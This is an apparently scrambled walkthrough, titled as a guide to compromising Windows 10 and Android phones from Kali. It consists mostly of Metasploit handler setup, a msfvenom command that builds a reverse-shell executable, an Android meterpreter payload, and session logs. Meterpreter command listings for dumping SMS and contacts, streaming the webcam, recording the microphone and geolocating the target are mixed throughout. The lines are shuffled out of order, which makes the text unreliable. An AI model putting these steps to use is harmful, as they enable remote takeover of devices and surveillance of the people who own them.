Hands-on: compromising Windows 10 and Android phones from Kali 2.0

[*] Starting the payload handler...

get_timeouts Get the current session timeout values

? Help menu

sleep Force Meterpreter to go quiet, then re-establish session.

check_root Check if device is rooted


Stdapi: Networking Commands


meterpreter > help



use exploit/multi/handler

read Reads data from a channel

Stdapi: System Commands

Android Commands

Name Current Setting Required Description

irb Drop into irb scripting mode

Stdapi: File system Commands

set LPORT 3333

geolocate Get current lat-long using geolocation

mkdir Make directory

disable_unicode_encoding Disables encoding of unicode strings

------- -----------


ifconfig Display interfaces

Command Description

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

dump_sms Get sms messages

help Help menu


LPORT 4444 yes The listen port

Module options (exploit/multi/handler):

------- -----------

channel Displays information or control active channels

meterpreter > webcam_stream

background Backgrounds the current session

dump_calllog Get call log

[*] Starting the payload handler...

---- --------------- -------- -----------

load Load one or more meterpreter extensions

------- -----------

write Writes data to a channel

webcam_list List webcams

run Executes a meterpreter script or Post module

send_sms Sends SMS from target session

pwd Print working directory

Core Commands

rm Delete the specified file

getwd Print working directory

(c) 2015 Microsoft Corporation。保留所有权利。


edit Edit a file

set payload windows/x64/shell/reverse_tcp

Command Description

upload Upload a file or directory

^C[-] Exploit failed: Interrupt

------- -----------

webcam_stream Play a video stream from the specified webcam

set_timeouts Set the current session timeout values

cat Read the contents of a file to the screen

resource Run the commands stored in a file

ls List files

Stdapi: Webcam Commands


record_mic Record audio from the default microphone for X seconds

[*] Started reverse TCP handler on

machine_id Get the MSF ID of the machine attached to the session

root@kali:~# service postgresql start

shell Drop into a system command shell

LPORT => 8888

[*] Preparing player...

[*] Starting the payload handler...

Name Current Setting Required Description


msf exploit(handler) > set LPORT 8888

dir List files (alias for ls)

msf exploit(handler) > exploit

[*] Opening player at: kxQmnwHE.html

Command Description

Payload options (windows/x64/shell/reverse_tcp):

webcam_snap Take a snapshot from the specified webcam

Microsoft Windows [版本 10.0.10586]

root@kali:~# msfconsole

cd Change directory


uuid Get the UUID for the current session

close Closes a channel

interval_collect Manage interval collection capabilities

info Displays information about a Post module

------- -----------



[*] Starting...

download Download a file or directory

use exploit/multi/handler

lpwd Print local working directory

quit Terminate the meterpreter session

[*] Exploit completed, but no session was created.

LHOST yes The listen address


execute Execute a command

[*] Device is not rooted

------- -----------

sysinfo Gets information about the remote system, such as OS

Command Description

msfvenom --platform windows -p windows/x64/shell/reverse_tcp LHOST= LPORT=3333 EXITFUNC=thread -b '\x00' -f exe-only -o /root/Desktop/shell1.exe

meterpreter > sessions -I

transport Change the current transport mechanism

bgrun Executes a meterpreter script as a background thread


show options

search Search for files

---- --------------- -------- -----------

meterpreter > check_root

route View and modify the routing table

[*] Started reverse TCP handler on

[*] Meterpreter session 1 opened ( -> at 2016-06-16 23:11:36 -0400

use Deprecated alias for 'load'


ps List running processes

bgkill Kills a background meterpreter script

[*] Sending stage (60790 bytes) to

webcam_chat Start a video chat



getuid Get the user that the server is running as

ipconfig Display interfaces



[*] Sending stage (336 bytes) to



enable_unicode_encoding Enables encoding of unicode strings

set PAYLOAD android/meterpreter/reverse_tcp

show options

rmdir Remove directory

bglist Lists running background scripts

Command Description

lcd Change local working directory

getlwd Print local working directory

wlan_geolocate Get current lat-long using WLAN information

[*] Streaming...

dump_contacts Get contacts list

Command Description

[*] Command shell session 1 opened ( -> at 2016-06-16 20:59:00 -0400

[*] Started reverse TCP handler on

portfwd Forward a local port to a remote service

exit Terminate the meterpreter session